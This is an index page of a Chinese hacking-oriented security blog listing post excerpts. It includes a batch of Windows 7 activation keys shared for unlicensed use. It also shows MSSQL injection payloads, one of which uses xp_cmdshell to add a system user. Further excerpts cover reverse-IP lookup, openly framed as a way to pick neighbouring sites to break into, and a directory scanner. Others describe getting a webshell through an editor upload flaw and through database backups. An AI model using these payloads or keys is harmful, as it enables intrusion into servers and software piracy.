Dec10th

win7神KEY激活成功

freboys | 经验技巧 | 评论:1 | 引用:0 | 浏览:

安装了64位的WIN7系统,使用神KEY激活成功,人品暴好。

发一组win7神Key

236TW-X778T-8MV9F-937GT-QVKBB
KH2J9-PC326-T44D4-39H6V-TVPBY
TFP9Y-VCY3P-VVH3T-8XXCC-MF4YK
J783Y-JKQWR-677Q8-KCXTF-BHWGC
C4M9W-WPRDG-QBB3F-VM9K8-KDQ9Y
2VCGQ-BRVJ4-2HGJ2-K36X9-J66JG
MGX79-TPQB9-KQ248-KXR2V-DHRTD
FJHWT-KDGHY-K2384-93CT7-323RC

 激活的时候,可以多试几次,看看运气如何。

全文阅读 »

Nov28th

mssql注入经常使用的命令

freboys | 经验技巧 | 评论:3 | 引用:0 | 浏览:

①、是否存在xp_cmdshell

and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')

②、用xp_cmdshell执行命令

;exec master..xp_cmdshell "net user name password /add"--
...

全文阅读 »

Nov27th

JSP探针-虚拟主机JSP环境检测工具

freboys | 常用工具 | 评论:0 | 引用:0 | 浏览:

         服务器配置好了JSP环境,需要测试一下配置是否正确,下面的代码可以用来侦测JSP主机的运行环境,例如操作系统、JDK版本、Servlet/JSP容器等信息。

全文阅读 »

Nov26th

Web Disk Manager网页版文件浏览器

freboys | 程序设计 | 评论:0 | 引用:0 | 浏览:

       网页版文件浏览器,完全模仿Windows文件管理器,小巧,清爽。

全文阅读 »

Nov26th

WinWebMail只能发信不能收信一次解决过程

freboys | 经验技巧 | 评论:0 | 引用:0 | 浏览:

       环境:windows2003 sp2+WinWebMail 3.8.0.1+Symantec杀毒

      使用很久的WinWebMail邮件服务器,实然出现了只能发信不能收信的故障,在排除了POP3和SMTP服务的问题后,通过系统命令Nslookup检查出域名的MX(邮件交换记录)解析错误所致,重新解析域名的MX记录,问题完美解决!

全文阅读 »

Nov25th

目录扫描工具wwwscan

freboys | 常用工具 | 评论:2 | 引用:0 | 浏览:

      扫描网站目录很好的一个工具,目录数据库已做了大量的优化。自己可以扩展自己的目录库,只要将对应的目录添加到cgi.list这个文件里就可以了。些工具在命令提示符下运行。

 

<Usage>:  wwwscan.exe <HostName|Ip> [Options]

<Options>:

          -p port        : set http/https port

...

全文阅读 »

Nov25th

IP地址反查,查询同IP绑定站点数量

freboys | 常用工具 | 评论:2 | 引用:0 | 浏览:

  玩黑的朋友都知道旁注。旁注,顾名思义是从旁注入,也就是说同从一台服务器的其它站上下手,来达到我们入侵的目的。但是如何知道同一台服务器挂了多少个网站呢?有一些网站专门提供了这种功能,即通过IP或者域名可以查询出这台服务器中绑定的域名数量。同时通过这种方法,我们在选购虚拟主机空间时可以做相关参考,因为服务器中用户太多就会影响自己网站的网速,甚至会对自己的网站的安全存在威胁。所以你在购买虚拟主机的时候,也不妨先查查其同台服务器中放置网站的个数。

  下面列出的这些网站,是我平时用的比较多的IP地址反查网站。

...

全文阅读 »

Nov24th

ZBlog如何统计浏览次数和显示浏览次数

freboys | 经验技巧 | 评论:2 | 引用:0 | 浏览:

  这几天模板修改了,没有过多的检查,今天早上一看Blog,怎么每篇文章的浏览次数没有增加,每天怎么说也有几个人浏览,怎么这个统计没有增加呢?于是跟正常的Blog做了对比,发现原来模板里改的有点问题,修复一下就可以了,修复过程如下:

  确保在模板文件夹TEMPLATE下的 default.html,single.html,catalog.html 等页面的头部有如下代码:

头部代码:

<script  type="text/javascript">
...

全文阅读 »

Nov24th

MSN Editor网页编辑器漏洞

freboys | 漏洞收集 | 评论:1 | 引用:0 | 浏览:

  MSN Editor网页编辑器是一个比较简陋,没有管理后台的编辑器。正因为他功能简单,所以给我们得到webshell带来一定的难道。但是它的图片上传程序存在利用的漏洞,那就是对于修改修改上传图片文件名处理不当,导致我们可以完美的利用IIS6文件解析漏洞拿到webshell。

MSN Editor网页编辑器

全文阅读 »

Nov21th

Mssql备份得webshell突破特殊字符限制

freboys | 经验技巧 | 评论:0 | 引用:0 | 浏览:

1.插入数据

mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:

use pubs; <===使用数据哭pubs
create table cmd (str image); <===建立个表cmd 一个属性为image的列
...

全文阅读 »

1/3页:  « 1 2  3  » 


关于本站 | 安全业务 | 联系我们 | 广告服务 | 友情链接 | 加入收藏夹

Copyright 2008-2010 无忧安全网 All rights reserved.Powered By Z-Blog

ICP备案编号:闽ICP备09054386号